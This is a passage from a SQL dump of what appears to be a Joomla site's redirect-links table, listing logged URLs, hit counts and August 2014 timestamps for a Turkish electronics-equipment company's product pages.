00:00:00',301),(2723,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=176:jvk1&catid=60:ikinciel&Itemid=164&lang=tr','','','',4,0,'2014-08-13 21:38:19','0000-00-00 00:00:00',301),(2724,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=164:ews-310&catid=44:pota&Itemid=160&lang=tr','','','',2,0,'2014-08-13 21:51:36','0000-00-00 00:00:00',301),(2725,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=54&Itemid=114','','','',2,0,'2014-08-13 22:02:29','0000-00-00 00:00:00',301),(2726,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=158:14fsfd&catid=44:pota&Itemid=159&lang=en','','','',4,0,'2014-08-13 22:11:31','0000-00-00 00:00:00',301),(2727,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=116:sogutucu-sprey-frz&catid=40:temizleme&Itemid=127&lang=tr','','','',4,0,'2014-08-13 22:19:48','0000-00-00 00:00:00',301),(2728,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=58:dusuk-hizli-smd-dizgi&Itemid=149&layout=default&lang=en','','','',8,0,'2014-08-13 22:28:28','0000-00-00 00:00:00',301),(2729,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=164%3Aews-310&catid=44%3Apota&Itemid=160&lang=tr','','','',1,0,'2014-08-13 22:29:19','0000-00-00 00:00:00',301),(2730,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=114:stensil-temizleme-rulolari-microwipe&catid=40:temizleme&Itemid=124&lang=en','','','',9,0,'2014-08-13 22:31:50','0000-00-00 00:00:00',301),(2731,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=146:manual-printer&catid=57:screen-printer&Itemid=&lang=tr','','','',1,0,'2014-08-13 22:42:35','0000-00-00 00:00:00',301),(2732,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=111:stencil-temizleme-bga&catid=40:temizleme&Itemid=122&lang=tr','','','',4,0,'2014-08-13 22:56:37','0000-00-00 00:00:00',301),(2733,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=153:ls60v&catid=58:dusuk-hizli-smd-dizgi&Itemid=154&lang=tr','','','',6,0,'2014-08-13 22:57:48','0000-00-00 00:00:00',301),(2734,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=137:chip-max-rosh-rdy&catid=56:rework-stasyonlari&Itemid=139&lang=en','','','',7,0,'2014-08-13 23:10:33','0000-00-00 00:00:00',301),(2735,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=153:ls60v&catid=58:dusuk-hizli-smd-dizgi&Itemid=154&lang=tr','','','',6,0,'2014-08-13 23:10:47','0000-00-00 00:00:00',301),(2736,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=155&Itemid=81&lang=tr','','','',3,0,'2014-08-13 23:12:16','0000-00-00 00:00:00',301),(2737,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=54&Itemid=114&lang=tr','','','',4,0,'2014-08-13 23:12:44','0000-00-00 00:00:00',301),(2738,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=164&Itemid=160&lang=tr','','','',2,0,'2014-08-13 23:18:52','0000-00-00 00:00:00',301),(2739,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=44:pota&Itemid=56&layout=default&lang=tr','','','',3,0,'2014-08-13 23:53:28','0000-00-00 00:00:00',301),(2740,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=46&Itemid=62','','','',3,0,'2014-08-14 00:01:38','0000-00-00 00:00:00',301),(2741,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=54&Itemid=114&lang=tr','','','',4,0,'2014-08-14 00:27:49','0000-00-00 00:00:00',301),(2742,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=43:ultra-hizli&Itemid=2&layout=default&lang=tr','','','',2,0,'2014-08-14 00:32:30','0000-00-00 00:00:00',301),(2743,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=146:manual-printer&catid=57:screen-printer&Itemid=148&lang=tr','','','',3,0,'2014-08-14 00:46:42','0000-00-00 00:00:00',301),(2744,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=tr','','','',6,0,'2014-08-14 00:48:22','0000-00-00 00:00:00',301),(2745,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=49&Itemid=61&lang=tr','','','',9,0,'2014-08-14 01:11:34','0000-00-00 00:00:00',301),(2746,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=153:ls60v&catid=58:dusuk-hizli-smd-dizgi&Itemid=154&lang=en','','','',5,0,'2014-08-14 01:16:44','0000-00-00 00:00:00',301),(2747,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=59&Itemid=155','','','',2,0,'2014-08-14 01:21:54','0000-00-00 00:00:00',301),(2748,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=113:etiket-sokucu-tidypen&catid=40:temizleme&Itemid=125&lang=en','','','',5,0,'2014-08-14 01:22:08','0000-00-00 00:00:00',301),(2749,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=158&Itemid=159&lang=en','','','',2,0,'2014-08-14 01:47:35','0000-00-00 00:00:00',301),(2750,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=139&Itemid=141&lang=en','','','',5,0,'2014-08-14 01:59:12','0000-00-00 00:00:00',301),(2751,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=111&Itemid=122&lang=tr','','','',5,0,'2014-08-14 02:03:19','0000-00-00 00:00:00',301),(2752,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=111&Itemid=122&lang=en','','','',4,0,'2014-08-14 02:17:13','0000-00-00 00:00:00',301),(2753,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=87&Itemid=103','','','',3,0,'2014-08-14 02:30:00','0000-00-00 00:00:00',301),(2754,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=117:optik-cihaz-temizleyicileri&catid=40:temizleme&Itemid=128','','','',3,0,'2014-08-14 02:47:02','0000-00-00 00:00:00',301),(2755,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=147:sp18p-l-screen-printer&catid=57:screen-printer&Itemid=146&lang=tr','','','',6,0,'2014-08-14 02:50:31','0000-00-00 00:00:00',301),(2756,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=44&Itemid=56','','','',3,0,'2014-08-14 02:51:54','0000-00-00 00:00:00',301),(2757,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=47&Itemid=1&lang=en','','','',4,0,'2014-08-14 03:21:06','0000-00-00 00:00:00',301),(2758,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=136&Itemid=138','','','',7,0,'2014-08-14 03:22:57','0000-00-00 00:00:00',301),(2759,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=119:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=117&lang=en','','','',5,0,'2014-08-14 03:50:16','0000-00-00 00:00:00',301),(2760,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=140&Itemid=142&lang=en','','','',3,0,'2014-08-14 04:09:22','0000-00-00 00:00:00',301),(2761,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=145&Itemid=147&lang=en','','','',4,0,'2014-08-14 04:42:02','0000-00-00 00:00:00',301),(2762,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=159:gf-c2-ht&catid=41:smd-firin&Itemid=162&lang=en','','','',11,0,'2014-08-14 05:16:19','0000-00-00 00:00:00',301),(2763,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=158:14fsfd&catid=44:pota&Itemid=159&lang=en','','','',116,0,'2014-08-14 05:41:37','0000-00-00 00:00:00',301),(2764,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=152&Itemid=153&lang=en','','','',4,0,'2014-08-14 06:01:57','0000-00-00 00:00:00',301),(2765,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=108&Itemid=119&lang=tr','','','',4,0,'2014-08-14 06:16:24','0000-00-00 00:00:00',301),(2766,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=41:smd-firin&Itemid=55&layout=default&lang=tr','','','',8,0,'2014-08-14 06:25:09','0000-00-00 00:00:00',301),(2767,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=152:ls60&catid=58:dusuk-hizli-smd-dizgi&Itemid=153&lang=en','','','',5,0,'2014-08-14 07:03:05','0000-00-00 00:00:00',301),(2768,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=57&Itemid=145&lang=en','','','',5,0,'2014-08-14 07:29:37','0000-00-00 00:00:00',301),(2769,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=58&Itemid=149&lang=tr','','','',9,0,'2014-08-14 07:52:35','0000-00-00 00:00:00',301),(2770,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40&Itemid=60&lang=tr','','','',5,0,'2014-08-14 08:16:15','0000-00-00 00:00:00',301),(2771,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=39:lehimleme&Itemid=57&layout=default','','','',3,0,'2014-08-14 08:16:51','0000-00-00 00:00:00',301),(2772,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=86:mx350&catid=36:orta-hizli&Itemid=98&lang=en','','','',6,0,'2014-08-14 08:21:40','0000-00-00 00:00:00',301),(2773,'http://www.3s-technologies.com.tr/index.php/en//images/stories/wawalo.gif','','','',5,0,'2014-08-14 08:24:54','0000-00-00 00:00:00',301),(2774,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=47&Itemid=1&lang=tr','','','',4,0,'2014-08-14 08:27:43','0000-00-00 00:00:00',301),(2775,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=99&Itemid=43&lang=tr','','','',2,0,'2014-08-14 09:19:51','0000-00-00 00:00:00',301),(2776,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=147:sp18p-l-screen-printer&catid=57:screen-printer&Itemid=146&lang=en','','','',7,0,'2014-08-14 09:33:21','0000-00-00 00:00:00',301),(2777,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40&Itemid=60&lang=tr','','','',7,0,'2014-08-14 09:39:35','0000-00-00 00:00:00',301),(2778,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=56&Itemid=137&lang=tr','','','',6,0,'2014-08-14 10:07:52','0000-00-00 00:00:00',301),(2779,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=71:rl131&catid=42:th-dizgi&Itemid=79&lang=tr','','','',7,0,'2014-08-14 10:09:21','0000-00-00 00:00:00',301),(2780,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=43:ultra-hizli&Itemid=2&layout=default','','','',3,0,'2014-08-14 10:27:21','0000-00-00 00:00:00',301),(2781,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=126:e-katalog&catid=55:katalog&Itemid=133&lang=en','','','',6,0,'2014-08-14 10:43:41','0000-00-00 00:00:00',301),(2782,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=159:gf-c2-ht&catid=41:smd-firin&Itemid=162','','','',2,0,'2014-08-14 10:45:21','0000-00-00 00:00:00',301),(2783,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=141:marksman&catid=56:rework-stasyonlari&Itemid=143&lang=en','','','',7,0,'2014-08-14 10:47:36','0000-00-00 00:00:00',301),(2784,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=56:rework-stasyonlari&Itemid=137&layout=default&lang=tr','','','',1,0,'2014-08-14 10:56:37','0000-00-00 00:00:00',301),(2785,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=51&Itemid=92&lang=tr','','','',4,0,'2014-08-14 11:04:38','0000-00-00 00:00:00',301),(2786,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=150:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=151&lang=en','','','',10,0,'2014-08-14 11:05:35','0000-00-00 00:00:00',301),(2787,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=1&layout=blog&Itemid=28&lang=tr','','','',2,0,'2014-08-14 11:08:06','0000-00-00 00:00:00',301),(2788,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=39&Itemid=57&lang=tr','','','',2,0,'2014-08-14 11:10:06','0000-00-00 00:00:00',301),(2789,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=106:mi-300&catid=44:pota&Itemid=113&lang=en','','','',2,0,'2014-08-14 11:12:21','0000-00-00 00:00:00',301),(2790,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=44&Itemid=56&lang=tr','','','',3,0,'2014-08-14 11:36:14','0000-00-00 00:00:00',301),(2791,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=57&Itemid=145&lang=tr','','','',3,0,'2014-08-14 11:46:45','0000-00-00 00:00:00',301),(2792,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=51:neo&Itemid=92&layout=default','','','',8,0,'2014-08-14 11:48:52','0000-00-00 00:00:00',301),(2793,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=153:ls60v&catid=58:dusuk-hizli-smd-dizgi&Itemid=154&lang=en','','','',2,0,'2014-08-14 11:51:08','0000-00-00 00:00:00',301),(2794,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=160&Itemid=161','','','',5,0,'2014-08-14 11:55:09','0000-00-00 00:00:00',301),(2795,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=56:rework-stasyonlari&Itemid=137&layout=default&lang=en','','','',6,0,'2014-08-14 11:59:38','0000-00-00 00:00:00',301),(2796,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=109:orta-guclu-flux-giderici-dc1&catid=40:temizleme&Itemid=120&lang=en','','','',8,0,'2014-08-14 12:01:16','0000-00-00 00:00:00',301),(2797,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=173:avf1&catid=60:ikinciel&Itemid=164&lang=en','','','',10,0,'2014-08-14 12:05:42','0000-00-00 00:00:00',301),(2798,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=36&Itemid=37&lang=tr','','','',4,0,'2014-08-14 12:16:13','0000-00-00 00:00:00',301),(2799,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=165:microcare&catid=1:son-haberler&Itemid=28&lang=en','','','',8,0,'2014-08-14 12:24:39','0000-00-00 00:00:00',301),(2800,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=165:microcare&catid=1:son-haberler&Itemid=28&lang=en','','','',7,0,'2014-08-14 12:51:51','0000-00-00 00:00:00',301),(2801,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59&Itemid=155&lang=tr','','','',4,0,'2014-08-14 13:02:19','0000-00-00 00:00:00',301),(2802,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=105&Itemid=112&lang=en','','','',3,0,'2014-08-14 13:03:06','0000-00-00 00:00:00',301),(2803,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=155:ct-3000n&catid=44:pota&Itemid=81&lang=en','','','',4,0,'2014-08-14 13:07:32','0000-00-00 00:00:00',301),(2804,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=121&Itemid=115&lang=en','','','',10,0,'2014-08-14 13:08:33','0000-00-00 00:00:00',301),(2805,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=136&Itemid=138&lang=en','','','',10,0,'2014-08-14 13:08:40','0000-00-00 00:00:00',301),(2806,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=137&Itemid=139&lang=en','','','',10,0,'2014-08-14 13:08:46','0000-00-00 00:00:00',301),(2807,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=138&Itemid=140&lang=en','','','',10,0,'2014-08-14 13:08:54','0000-00-00 00:00:00',301),(2808,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=139&Itemid=141&lang=en','','','',10,0,'2014-08-14 13:09:01','0000-00-00 00:00:00',301),(2809,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=140&Itemid=142&lang=en','','','',10,0,'2014-08-14 13:09:07','0000-00-00 00:00:00',301),(2810,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=141&Itemid=143&lang=en','','','',10,0,'2014-08-14 13:09:13','0000-00-00 00:00:00',301),(2811,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=145&Itemid=147&lang=en','','','',10,0,'2014-08-14 13:09:19','0000-00-00 00:00:00',301),(2812,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=146&Itemid=148&lang=en','','','',10,0,'2014-08-14 13:09:26','0000-00-00 00:00:00',301),(2813,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=149&Itemid=150&lang=en','','','',10,0,'2014-08-14 13:09:32','0000-00-00 00:00:00',301),(2814,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=150&Itemid=151&lang=en','','','',10,0,'2014-08-14 13:09:39','0000-00-00 00:00:00',301),(2815,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=168&Itemid=58&lang=en','','','',6,0,'2014-08-14 13:09:46','0000-00-00 00:00:00',301),(2816,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=151&Itemid=152&lang=en','','','',10,0,'2014-08-14 13:09:46','0000-00-00 00:00:00',301),(2817,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=152&Itemid=153&lang=en','','','',10,0,'2014-08-14 13:09:56','0000-00-00 00:00:00',301),(2818,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=153&Itemid=154&lang=en','','','',10,0,'2014-08-14 13:10:02','0000-00-00 00:00:00',301),(2819,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=167&Itemid=163&lang=en','','','',10,0,'2014-08-14 13:10:10','0000-00-00 00:00:00',301),(2820,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=73&Itemid=82&lang=en','','','',10,0,'2014-08-14 13:10:31','0000-00-00 00:00:00',301),(2821,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=84&Itemid=96&lang=en','','','',10,0,'2014-08-14 13:11:10','0000-00-00 00:00:00',301),(2822,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=86&Itemid=98&lang=en','','','',10,0,'2014-08-14 13:11:23','0000-00-00 00:00:00',301),(2823,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=89&Itemid=101&lang=en','','','',10,0,'2014-08-14 13:11:33','0000-00-00 00:00:00',301),(2824,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=94&Itemid=105&lang=en','','','',10,0,'2014-08-14 13:11:38','0000-00-00 00:00:00',301),(2825,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=95&Itemid=106&lang=en','','','',10,0,'2014-08-14 13:11:45','0000-00-00 00:00:00',301),(2826,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=96&Itemid=107&lang=en','','','',10,0,'2014-08-14 13:11:50','0000-00-00 00:00:00',301),(2827,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=97&Itemid=108&lang=en','','','',10,0,'2014-08-14 13:11:56','0000-00-00 00:00:00',301),(2828,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=98&Itemid=109&lang=en','','','',10,0,'2014-08-14 13:12:07','0000-00-00 00:00:00',301),(2829,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=57:screen-printer&Itemid=145&layout=default','','','',104,0,'2014-08-14 13:25:19','0000-00-00 00:00:00',301),(2830,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=87&Itemid=103&lang=tr','','','',3,0,'2014-08-14 13:28:42','0000-00-00 00:00:00',301),(2831,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=155&Itemid=81','','','',3,0,'2014-08-14 13:36:22','0000-00-00 00:00:00',301),(2832,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=155&Itemid=81&lang=tr','','','',2,0,'2014-08-14 13:41:08','0000-00-00 00:00:00',301),(2833,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=96&Itemid=107&lang=en','','','',7,0,'2014-08-14 13:55:04','0000-00-00 00:00:00',301),(2834,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=81&Itemid=40&lang=en','','','',5,0,'2014-08-14 14:20:28','0000-00-00 00:00:00',301),(2835,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=58&Itemid=149','','','',3,0,'2014-08-14 14:26:28','0000-00-00 00:00:00',301),(2836,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=121:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=115','','','',9,0,'2014-08-14 14:41:36','0000-00-00 00:00:00',301),(2837,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=80&Itemid=87&lang=tr','','','',3,0,'2014-08-14 15:20:39','0000-00-00 00:00:00',301),(2838,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=173:avf1&catid=60:ikinciel&Itemid=164&lang=tr','','','',7,0,'2014-08-14 15:31:40','0000-00-00 00:00:00',301),(2839,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40:temizleme&Itemid=60&layout=default&lang=en&limitstart=10','','','',8,0,'2014-08-14 15:49:21','0000-00-00 00:00:00',301),(2840,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=57&Itemid=145','','','',9,0,'2014-08-14 15:50:12','0000-00-00 00:00:00',301),(2841,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=28','','','',6,0,'2014-08-14 15:53:51','0000-00-00 00:00:00',301),(2842,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=113:etiket-sokucu-tidypen&catid=40:temizleme&Itemid=125&lang=tr','','','',4,0,'2014-08-14 15:54:22','0000-00-00 00:00:00',301),(2843,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=146:manual-printer&catid=57:screen-printer&Itemid=148&lang=tr','','','',7,0,'2014-08-14 15:55:40','0000-00-00 00:00:00',301),(2844,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=164:ews-310&catid=44:pota&Itemid=160&lang=tr','','','',4,0,'2014-08-14 15:58:53','0000-00-00 00:00:00',301),(2845,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=53&Itemid=110&lang=tr','','','',6,0,'2014-08-14 16:25:12','0000-00-00 00:00:00',301),(2846,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=47&Itemid=1&lang=tr','','','',4,0,'2014-08-14 16:31:54','0000-00-00 00:00:00',301),(2847,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=60&Itemid=164&lang=tr','','','',8,0,'2014-08-14 16:35:35','0000-00-00 00:00:00',301),(2848,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=122:stencilwasher-eco&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=129&lang=tr','','','',6,0,'2014-08-14 16:36:25','0000-00-00 00:00:00',301),(2849,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=107:yuksek-guclu-flux-giderici-frc&catid=40:temizleme&Itemid=118&lang=tr','','','',126,0,'2014-08-14 16:45:22','0000-00-00 00:00:00',301),(2850,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=153:ls60v&catid=58:dusuk-hizli-smd-dizgi&Itemid=154&lang=tr','','','',115,0,'2014-08-14 16:52:06','0000-00-00 00:00:00',301),(2851,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=117&Itemid=128&lang=en','','','',3,0,'2014-08-14 16:59:08','0000-00-00 00:00:00',301),(2852,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=42:th-dizgi&Itemid=27&layout=default','','','',2,0,'2014-08-14 17:28:05','0000-00-00 00:00:00',301),(2853,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=55:katalog&Itemid=1&layout=default&lang=en','','','',4,0,'2014-08-14 17:34:53','0000-00-00 00:00:00',301),(2854,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=91:osai-neo&catid=1:son-haberler&Itemid=28&lang=en','','','',6,0,'2014-08-14 17:37:06','0000-00-00 00:00:00',301),(2855,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=149&Itemid=150','','','',6,0,'2014-08-14 17:48:21','0000-00-00 00:00:00',301),(2856,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=57&Itemid=145&lang=tr','','','',4,0,'2014-08-14 17:50:40','0000-00-00 00:00:00',301),(2857,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=151&Itemid=152&lang=en','','','',4,0,'2014-08-14 18:01:50','0000-00-00 00:00:00',301),(2858,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=46:konveyorler&Itemid=62&layout=default&lang=en','','','',6,0,'2014-08-14 18:06:20','0000-00-00 00:00:00',301),(2859,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=46:konveyorler&Itemid=62&layout=default&lang=en','','','',1,0,'2014-08-14 18:14:29','0000-00-00 00:00:00',301),(2860,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=164&Itemid=160&lang=tr','','','',4,0,'2014-08-14 18:32:28','0000-00-00 00:00:00',301),(2861,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59&Itemid=155&lang=en','','','',6,0,'2014-08-14 18:33:20','0000-00-00 00:00:00',301),(2862,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=127&Itemid=134&lang=en','','','',4,0,'2014-08-14 18:35:35','0000-00-00 00:00:00',301),(2863,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=117:optik-cihaz-temizleyicileri&catid=40:temizleme&Itemid=128','','','',2,0,'2014-08-14 19:09:21','0000-00-00 